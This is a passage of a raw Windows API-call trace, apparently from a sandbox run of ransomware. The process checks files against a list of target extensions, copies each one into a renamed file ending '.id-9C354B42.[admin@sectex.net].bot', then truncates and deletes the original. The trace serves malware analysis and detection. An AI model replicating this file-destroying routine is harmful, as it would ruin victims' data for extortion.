	[0046.850] lstrlenW (lpString=".dbf") returned 4
	[0046.850] lstrcmpiW (lpString1=".dbf", lpString2=".PNG") returned -1
	[0046.850] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SLATE\\THMBNAIL.PNG") returned 74
	[0046.850] lstrlenW (lpString=".1cd") returned 4
	[0046.850] lstrcmpiW (lpString1=".1cd", lpString2=".PNG") returned -1
	[0046.850] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SLATE\\THMBNAIL.PNG") returned 74
	[0046.850] lstrlenW (lpString=".jpg") returned 4
	[0046.850] lstrcmpiW (lpString1=".jpg", lpString2=".PNG") returned -1
	[0046.850] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SLATE\\THMBNAIL.PNG") returned 74
	[0046.850] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SLATE\\THMBNAIL.PNG") returned 74
	[0046.850] lstrlenW (lpString=".doc") returned 4
	[0046.850] lstrcmpiW (lpString1=".doc", lpString2=".PNG") returned -1
	[0046.850] lstrlenW (lpString=".docx") returned 5
	[0046.850] lstrcmpiW (lpString1=".docx", lpString2="L.PNG") returned -1
	[0046.850] lstrlenW (lpString=".pdf") returned 4
	[0046.850] lstrcmpiW (lpString1=".pdf", lpString2=".PNG") returned -1
	[0046.850] lstrlenW (lpString=".xls") returned 4
	[0046.850] lstrcmpiW (lpString1=".xls", lpString2=".PNG") returned 1
	[0046.850] lstrlenW (lpString=".xlsx") returned 5
	[0046.850] lstrcmpiW (lpString1=".xlsx", lpString2="L.PNG") returned -1
	[0046.850] lstrlenW (lpString=".ppt") returned 4
	[0046.850] lstrcmpiW (lpString1=".ppt", lpString2=".PNG") returned 1
	[0046.850] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SLATE\\THMBNAIL.PNG") returned 74
	[0046.850] lstrlenW (lpString=".zip") returned 4
	[0046.850] lstrcmpiW (lpString1=".zip", lpString2=".PNG") returned 1
	[0046.850] lstrlenW (lpString=".rar") returned 4
	[0046.850] lstrcmpiW (lpString1=".rar", lpString2=".PNG") returned 1
	[0046.850] lstrlenW (lpString=".bz2") returned 4
	[0046.850] lstrcmpiW (lpString1=".bz2", lpString2=".PNG") returned -1
	[0046.850] lstrlenW (lpString=".7z") returned 3
	[0046.850] lstrcmpiW (lpString1=".7z", lpString2="PNG") returned -1
	[0046.850] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SLATE\\THMBNAIL.PNG") returned 74
	[0046.851] lstrlenW (lpString=".dbf") returned 4
	[0046.851] lstrcmpiW (lpString1=".dbf", lpString2=".PNG") returned -1
	[0046.851] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SLATE\\THMBNAIL.PNG") returned 74
	[0046.851] lstrlenW (lpString=".1cd") returned 4
	[0046.851] lstrcmpiW (lpString1=".1cd", lpString2=".PNG") returned -1
	[0046.851] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SLATE\\THMBNAIL.PNG") returned 74
	[0046.851] lstrlenW (lpString=".jpg") returned 4
	[0046.851] lstrcmpiW (lpString1=".jpg", lpString2=".PNG") returned -1
	[0046.851] lstrcmpiW (lpString1=".GIF", lpString2=".bot") returned 1
	[0046.851] lstrlenW (lpString="PREVIEW.GIF") returned 11
	[0046.851] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SONORA\\PREVIEW.GIF" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\sonora\\preview.gif"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1fc
	[0046.851] GetFileSizeEx (in: hFile=0x1fc, lpFileSize=0xa41ff1c | out: lpFileSize=0xa41ff1c*=2209) returned 1
	[0046.851] CloseHandle (hObject=0x1fc) returned 1
	[0046.851] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SONORA\\PREVIEW.GIF" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\sonora\\preview.gif")) returned 0x20
	[0046.851] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SONORA\\PREVIEW.GIF.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\sonora\\preview.gif.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0046.852] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SONORA\\PREVIEW.GIF" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\sonora\\preview.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1fc
	[0046.852] SetFilePointerEx (in: hFile=0x1fc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa41fec8 | out: lpNewFilePointer=0x0) returned 1
	[0046.852] SetFilePointerEx (in: hFile=0x1fc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa41fec8 | out: lpNewFilePointer=0x0) returned 1
	[0046.852] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SONORA\\PREVIEW.GIF.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\sonora\\preview.gif.id-9c354b42.[admin@sectex.net].bot"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1a8
	[0047.904] GetLastError () returned 0x0
	[0047.905] ReadFile (in: hFile=0x1fc, lpBuffer=0xafa0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa41fed4, lpOverlapped=0x0 | out: lpBuffer=0xafa0020*, lpNumberOfBytesRead=0xa41fed4*=0x8a1, lpOverlapped=0x0) returned 1
	[0047.906] WriteFile (in: hFile=0x1a8, lpBuffer=0xafa0020*, nNumberOfBytesToWrite=0x8b0, lpNumberOfBytesWritten=0xa41fc9c, lpOverlapped=0x0 | out: lpBuffer=0xafa0020*, lpNumberOfBytesWritten=0xa41fc9c*=0x8b0, lpOverlapped=0x0) returned 1
	[0047.907] ReadFile (in: hFile=0x1fc, lpBuffer=0xafa0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa41fed4, lpOverlapped=0x0 | out: lpBuffer=0xafa0020*, lpNumberOfBytesRead=0xa41fed4*=0x0, lpOverlapped=0x0) returned 1
	[0047.907] WriteFile (in: hFile=0x1a8, lpBuffer=0xafa0020*, nNumberOfBytesToWrite=0xea, lpNumberOfBytesWritten=0xa41fc9c, lpOverlapped=0x0 | out: lpBuffer=0xafa0020*, lpNumberOfBytesWritten=0xa41fc9c*=0xea, lpOverlapped=0x0) returned 1
	[0047.907] SetEndOfFile (hFile=0x1a8) returned 1
	[0047.907] CloseHandle (hObject=0x1a8) returned 1
	[0047.907] SetFilePointerEx (in: hFile=0x1fc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa41fec8 | out: lpNewFilePointer=0x0) returned 1
	[0047.907] SetEndOfFile (hFile=0x1fc) returned 1
	[0047.908] CloseHandle (hObject=0x1fc) returned 1
	[0047.908] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SONORA\\PREVIEW.GIF.id-9C354B42.[admin@sectex.net].bot", dwFileAttributes=0x20) returned 1
	[0047.908] DeleteFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SONORA\\PREVIEW.GIF" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\sonora\\preview.gif")) returned 1
	[0047.909] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SONORA\\PREVIEW.GIF") returned 74
	[0047.909] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SONORA\\PREVIEW.GIF") returned 74
	[0047.909] lstrlenW (lpString=".doc") returned 4
	[0047.909] lstrcmpiW (lpString1=".doc", lpString2=".GIF") returned -1
	[0047.909] lstrlenW (lpString=".docx") returned 5
	[0047.909] lstrcmpiW (lpString1=".docx", lpString2="W.GIF") returned -1
	[0047.909] lstrlenW (lpString=".pdf") returned 4
	[0047.909] lstrcmpiW (lpString1=".pdf", lpString2=".GIF") returned 1
	[0047.909] lstrlenW (lpString=".xls") returned 4
	[0047.909] lstrcmpiW (lpString1=".xls", lpString2=".GIF") returned 1
	[0047.909] lstrlenW (lpString=".xlsx") returned 5
	[0047.909] lstrcmpiW (lpString1=".xlsx", lpString2="W.GIF") returned -1
	[0047.909] lstrlenW (lpString=".ppt") returned 4
	[0047.909] lstrcmpiW (lpString1=".ppt", lpString2=".GIF") returned 1
	[0047.909] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SONORA\\PREVIEW.GIF") returned 74
	[0047.909] lstrlenW (lpString=".zip") returned 4
	[0047.909] lstrcmpiW (lpString1=".zip", lpString2=".GIF") returned 1
	[0047.909] lstrlenW (lpString=".rar") returned 4
	[0047.909] lstrcmpiW (lpString1=".rar", lpString2=".GIF") returned 1
	[0047.909] lstrlenW (lpString=".bz2") returned 4
	[0047.909] lstrcmpiW (lpString1=".bz2", lpString2=".GIF") returned -1
	[0047.909] lstrlenW (lpString=".7z") returned 3
	[0047.909] lstrcmpiW (lpString1=".7z", lpString2="GIF") returned -1
	[0047.909] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SONORA\\PREVIEW.GIF") returned 74
	[0047.909] lstrlenW (lpString=".dbf") returned 4
	[0047.909] lstrcmpiW (lpString1=".dbf", lpString2=".GIF") returned -1
	[0047.909] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SONORA\\PREVIEW.GIF") returned 74
	[0047.909] lstrlenW (lpString=".1cd") returned 4
	[0047.909] lstrcmpiW (lpString1=".1cd", lpString2=".GIF") returned -1
	[0047.909] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SONORA\\PREVIEW.GIF") returned 74
	[0047.909] lstrlenW (lpString=".jpg") returned 4
	[0047.909] lstrcmpiW (lpString1=".jpg", lpString2=".GIF") returned 1
	[0047.910] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SONORA\\PREVIEW.GIF") returned 74
	[0047.910] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SONORA\\PREVIEW.GIF") returned 74
	[0047.910] lstrlenW (lpString=".doc") returned 4
	[0047.910] lstrcmpiW (lpString1=".doc", lpString2=".GIF") returned -1
	[0047.910] lstrlenW (lpString=".docx") returned 5
	[0047.910] lstrcmpiW (lpString1=".docx", lpString2="W.GIF") returned -1
	[0047.910] lstrlenW (lpString=".pdf") returned 4
	[0047.910] lstrcmpiW (lpString1=".pdf", lpString2=".GIF") returned 1
	[0047.910] lstrlenW (lpString=".xls") returned 4
	[0047.910] lstrcmpiW (lpString1=".xls", lpString2=".GIF") returned 1
	[0047.910] lstrlenW (lpString=".xlsx") returned 5
	[0047.910] lstrcmpiW (lpString1=".xlsx", lpString2="W.GIF") returned -1
	[0047.910] lstrlenW (lpString=".ppt") returned 4
	[0047.910] lstrcmpiW (lpString1=".ppt", lpString2=".GIF") returned 1
	[0047.910] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SONORA\\PREVIEW.GIF") returned 74
	[0047.910] lstrlenW (lpString=".zip") returned 4
	[0047.910] lstrcmpiW (lpString1=".zip", lpString2=".GIF") returned 1
	[0047.910] lstrlenW (lpString=".rar") returned 4
	[0047.910] lstrcmpiW (lpString1=".rar", lpString2=".GIF") returned 1
	[0047.910] lstrlenW (lpString=".bz2") returned 4
	[0047.910] lstrcmpiW (lpString1=".bz2", lpString2=".GIF") returned -1
	[0047.910] lstrlenW (lpString=".7z") returned 3
	[0047.910] lstrcmpiW (lpString1=".7z", lpString2="GIF") returned -1
	[0047.910] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SONORA\\PREVIEW.GIF") returned 74
	[0047.910] lstrlenW (lpString=".dbf") returned 4
	[0047.910] lstrcmpiW (lpString1=".dbf", lpString2=".GIF") returned -1
	[0047.910] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SONORA\\PREVIEW.GIF") returned 74
	[0047.910] lstrlenW (lpString=".1cd") returned 4
	[0047.910] lstrcmpiW (lpString1=".1cd", lpString2=".GIF") returned -1
	[0047.910] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SONORA\\PREVIEW.GIF") returned 74
	[0047.910] lstrlenW (lpString=".jpg") returned 4
	[0047.910] lstrcmpiW (lpString1=".jpg", lpString2=".GIF") returned 1
	[0047.911] lstrcmpiW (lpString1=".GIF", lpString2=".bot") returned 1
	[0047.911] lstrlenW (lpString="PREVIEW.GIF") returned 11
	[0047.911] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\STUDIO\\PREVIEW.GIF" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\studio\\preview.gif"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1fc
	[0047.911] GetFileSizeEx (in: hFile=0x1fc, lpFileSize=0xa41ff1c | out: lpFileSize=0xa41ff1c*=1675) returned 1
	[0047.911] CloseHandle (hObject=0x1fc) returned 1
	[0047.912] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\STUDIO\\PREVIEW.GIF" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\studio\\preview.gif")) returned 0x20
	[0047.912] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\STUDIO\\PREVIEW.GIF.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\studio\\preview.gif.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0047.912] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\STUDIO\\PREVIEW.GIF" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\studio\\preview.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1fc
	[0047.912] SetFilePointerEx (in: hFile=0x1fc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa41fec8 | out: lpNewFilePointer=0x0) returned 1
	[0047.912] SetFilePointerEx (in: hFile=0x1fc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa41fec8 | out: lpNewFilePointer=0x0) returned 1
	[0047.912] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\STUDIO\\PREVIEW.GIF.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\studio\\preview.gif.id-9c354b42.[admin@sectex.net].bot"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1f8
	[0047.914] GetLastError () returned 0x0
	[0047.914] ReadFile (in: hFile=0x1fc, lpBuffer=0xafa0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa41fed4, lpOverlapped=0x0 | out: lpBuffer=0xafa0020*, lpNumberOfBytesRead=0xa41fed4*=0x68b, lpOverlapped=0x0) returned 1
	[0047.916] WriteFile (in: hFile=0x1f8, lpBuffer=0xafa0020*, nNumberOfBytesToWrite=0x690, lpNumberOfBytesWritten=0xa41fc9c, lpOverlapped=0x0 | out: lpBuffer=0xafa0020*, lpNumberOfBytesWritten=0xa41fc9c*=0x690, lpOverlapped=0x0) returned 1
	[0047.916] ReadFile (in: hFile=0x1fc, lpBuffer=0xafa0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa41fed4, lpOverlapped=0x0 | out: lpBuffer=0xafa0020*, lpNumberOfBytesRead=0xa41fed4*=0x0, lpOverlapped=0x0) returned 1
	[0047.916] WriteFile (in: hFile=0x1f8, lpBuffer=0xafa0020*, nNumberOfBytesToWrite=0xea, lpNumberOfBytesWritten=0xa41fc9c, lpOverlapped=0x0 | out: lpBuffer=0xafa0020*, lpNumberOfBytesWritten=0xa41fc9c*=0xea, lpOverlapped=0x0) returned 1
	[0047.917] SetEndOfFile (hFile=0x1f8) returned 1
	[0047.917] CloseHandle (hObject=0x1f8) returned 1
	[0047.917] SetFilePointerEx (in: hFile=0x1fc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa41fec8 | out: lpNewFilePointer=0x0) returned 1
	[0047.917] SetEndOfFile (hFile=0x1fc) returned 1
	[0047.918] CloseHandle (hObject=0x1fc) returned 1
	[0047.918] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\STUDIO\\PREVIEW.GIF.id-9C354B42.[admin@sectex.net].bot", dwFileAttributes=0x20) returned 1
	[0047.918] DeleteFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\STUDIO\\PREVIEW.GIF" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\studio\\preview.gif")) returned 1
	[0047.918] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\STUDIO\\PREVIEW.GIF") returned 74
	[0047.918] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\STUDIO\\PREVIEW.GIF") returned 74
	[0047.918] lstrlenW (lpString=".doc") returned 4
	[0047.918] lstrcmpiW (lpString1=".doc", lpString2=".GIF") returned -1
	[0047.918] lstrlenW (lpString=".docx") returned 5
	[0047.918] lstrcmpiW (lpString1=".docx", lpString2="W.GIF") returned -1
	[0047.918] lstrlenW (lpString=".pdf") returned 4
	[0047.918] lstrcmpiW (lpString1=".pdf", lpString2=".GIF") returned 1
	[0047.918] lstrlenW (lpString=".xls") returned 4
	[0047.918] lstrcmpiW (lpString1=".xls", lpString2=".GIF") returned 1
	[0047.918] lstrlenW (lpString=".xlsx") returned 5
	[0047.918] lstrcmpiW (lpString1=".xlsx", lpString2="W.GIF") returned -1
	[0047.918] lstrlenW (lpString=".ppt") returned 4
	[0047.918] lstrcmpiW (lpString1=".ppt", lpString2=".GIF") returned 1
	[0047.919] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\STUDIO\\PREVIEW.GIF") returned 74
	[0047.919] lstrlenW (lpString=".zip") returned 4
	[0047.919] lstrcmpiW (lpString1=".zip", lpString2=".GIF") returned 1
	[0047.919] lstrlenW (lpString=".rar") returned 4
	[0047.919] lstrcmpiW (lpString1=".rar", lpString2=".GIF") returned 1
	[0047.919] lstrlenW (lpString=".bz2") returned 4
	[0047.919] lstrcmpiW (lpString1=".bz2", lpString2=".GIF") returned -1
	[0047.919] lstrlenW (lpString=".7z") returned 3
	[0047.919] lstrcmpiW (lpString1=".7z", lpString2="GIF") returned -1
	[0047.919] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\STUDIO\\PREVIEW.GIF") returned 74
	[0047.919] lstrlenW (lpString=".dbf") returned 4
	[0047.919] lstrcmpiW (lpString1=".dbf", lpString2=".GIF") returned -1
	[0047.919] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\STUDIO\\PREVIEW.GIF") returned 74
	[0047.919] lstrlenW (lpString=".1cd") returned 4
	[0047.919] lstrcmpiW (lpString1=".1cd", lpString2=".GIF") returned -1
	[0047.919] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\STUDIO\\PREVIEW.GIF") returned 74
	[0047.919] lstrlenW (lpString=".jpg") returned 4
	[0047.919] lstrcmpiW (lpString1=".jpg", lpString2=".GIF") returned 1
	[0047.919] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\STUDIO\\PREVIEW.GIF") returned 74
	[0047.919] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\STUDIO\\PREVIEW.GIF") returned 74
	[0047.919] lstrlenW (lpString=".doc") returned 4
	[0047.919] lstrcmpiW (lpString1=".doc", lpString2=".GIF") returned -1
	[0047.919] lstrlenW (lpString=".docx") returned 5
	[0047.919] lstrcmpiW (lpString1=".docx", lpString2="W.GIF") returned -1
	[0047.919] lstrlenW (lpString=".pdf") returned 4
	[0047.919] lstrcmpiW (lpString1=".pdf", lpString2=".GIF") returned 1
	[0047.919] lstrlenW (lpString=".xls") returned 4
	[0047.919] lstrcmpiW (lpString1=".xls", lpString2=".GIF") returned 1
	[0047.919] lstrlenW (lpString=".xlsx") returned 5
	[0047.919] lstrcmpiW (lpString1=".xlsx", lpString2="W.GIF") returned -1
	[0047.919] lstrlenW (lpString=".ppt") returned 4
	[0047.919] lstrcmpiW (lpString1=".ppt", lpString2=".GIF") returned 1
	[0047.919] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\STUDIO\\PREVIEW.GIF") returned 74
	[0047.919] lstrlenW (lpString=".zip") returned 4
	[0047.919] lstrcmpiW (lpString1=".zip", lpString2=".GIF") returned 1
	[0047.920] lstrlenW (lpString=".rar") returned 4
	[0047.920] lstrcmpiW (lpString1=".rar", lpString2=".GIF") returned 1
	[0047.920] lstrlenW (lpString=".bz2") returned 4
	[0047.920] lstrcmpiW (lpString1=".bz2", lpString2=".GIF") returned -1
	[0047.920] lstrlenW (lpString=".7z") returned 3
	[0047.920] lstrcmpiW (lpString1=".7z", lpString2="GIF") returned -1
	[0047.920] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\STUDIO\\PREVIEW.GIF") returned 74
	[0047.920] lstrlenW (lpString=".dbf") returned 4
	[0047.920] lstrcmpiW (lpString1=".dbf", lpString2=".GIF") returned -1
	[0047.920] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\STUDIO\\PREVIEW.GIF") returned 74
	[0047.920] lstrlenW (lpString=".1cd") returned 4
	[0047.920] lstrcmpiW (lpString1=".1cd", lpString2=".GIF") returned -1
	[0047.920] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\STUDIO\\PREVIEW.GIF") returned 74
	[0047.920] lstrlenW (lpString=".jpg") returned 4
	[0047.920] lstrcmpiW (lpString1=".jpg", lpString2=".GIF") returned 1
	[0047.920] lstrcmpiW (lpString1=".PNG", lpString2=".bot") returned 1
	[0047.920] lstrlenW (lpString="THMBNAIL.PNG") returned 12
	[0047.920] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\STUDIO\\THMBNAIL.PNG" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\studio\\thmbnail.png"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1fc
	[0047.920] GetFileSizeEx (in: hFile=0x1fc, lpFileSize=0xa41ff1c | out: lpFileSize=0xa41ff1c*=18380) returned 1
	[0047.920] CloseHandle (hObject=0x1fc) returned 1
	[0047.920] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\STUDIO\\THMBNAIL.PNG" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\studio\\thmbnail.png")) returned 0x20
	[0047.921] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\STUDIO\\THMBNAIL.PNG.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\studio\\thmbnail.png.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0047.921] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\STUDIO\\THMBNAIL.PNG" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\studio\\thmbnail.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1fc
	[0047.921] SetFilePointerEx (in: hFile=0x1fc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa41fec8 | out: lpNewFilePointer=0x0) returned 1
	[0047.921] SetFilePointerEx (in: hFile=0x1fc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa41fec8 | out: lpNewFilePointer=0x0) returned 1
	[0047.921] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\STUDIO\\THMBNAIL.PNG.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\studio\\thmbnail.png.id-9c354b42.[admin@sectex.net].bot"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1f8
	[0047.921] GetLastError () returned 0x0
	[0047.921] ReadFile (in: hFile=0x1fc, lpBuffer=0xafa0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa41fed4, lpOverlapped=0x0 | out: lpBuffer=0xafa0020*, lpNumberOfBytesRead=0xa41fed4*=0x47cc, lpOverlapped=0x0) returned 1
	[0047.925] WriteFile (in: hFile=0x1f8, lpBuffer=0xafa0020*, nNumberOfBytesToWrite=0x47d0, lpNumberOfBytesWritten=0xa41fc9c, lpOverlapped=0x0 | out: lpBuffer=0xafa0020*, lpNumberOfBytesWritten=0xa41fc9c*=0x47d0, lpOverlapped=0x0) returned 1
	[0047.926] ReadFile (in: hFile=0x1fc, lpBuffer=0xafa0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa41fed4, lpOverlapped=0x0 | out: lpBuffer=0xafa0020*, lpNumberOfBytesRead=0xa41fed4*=0x0, lpOverlapped=0x0) returned 1
	[0047.926] WriteFile (in: hFile=0x1f8, lpBuffer=0xafa0020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0xa41fc9c, lpOverlapped=0x0 | out: lpBuffer=0xafa0020*, lpNumberOfBytesWritten=0xa41fc9c*=0xec, lpOverlapped=0x0) returned 1
	[0047.927] SetEndOfFile (hFile=0x1f8) returned 1
	[0047.927] CloseHandle (hObject=0x1f8) returned 1
	[0047.929] SetFilePointerEx (in: hFile=0x1fc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa41fec8 | out: lpNewFilePointer=0x0) returned 1
	[0047.929] SetEndOfFile (hFile=0x1fc) returned 1
	[0047.930] CloseHandle (hObject=0x1fc) returned 1
	[0047.930] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\STUDIO\\THMBNAIL.PNG.id-9C354B42.[admin@sectex.net].bot", dwFileAttributes=0x20) returned 1
	[0047.930] DeleteFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\STUDIO\\THMBNAIL.PNG" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\studio\\thmbnail.png")) returned 1
	[0047.931] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\STUDIO\\THMBNAIL.PNG") returned 75
	[0047.931] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\STUDIO\\THMBNAIL.PNG") returned 75
	[0047.931] lstrlenW (lpString=".doc") returned 4
	[0047.931] lstrcmpiW (lpString1=".doc", lpString2=".PNG") returned -1
	[0047.931] lstrlenW (lpString=".docx") returned 5
	[0047.931] lstrcmpiW (lpString1=".docx", lpString2="L.PNG") returned -1
	[0047.931] lstrlenW (lpString=".pdf") returned 4
	[0047.931] lstrcmpiW (lpString1=".pdf", lpString2=".PNG") returned -1
	[0047.931] lstrlenW (lpString=".xls") returned 4
	[0047.931] lstrcmpiW (lpString1=".xls", lpString2=".PNG") returned 1
	[0047.931] lstrlenW (lpString=".xlsx") returned 5
	[0047.931] lstrcmpiW (lpString1=".xlsx", lpString2="L.PNG") returned -1
	[0047.931] lstrlenW (lpString=".ppt") returned 4
	[0047.931] lstrcmpiW (lpString1=".ppt", lpString2=".PNG") returned 1
	[0047.931] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\STUDIO\\THMBNAIL.PNG") returned 75
	[0047.931] lstrlenW (lpString=".zip") returned 4
	[0047.931] lstrcmpiW (lpString1=".zip", lpString2=".PNG") returned 1
	[0047.931] lstrlenW (lpString=".rar") returned 4
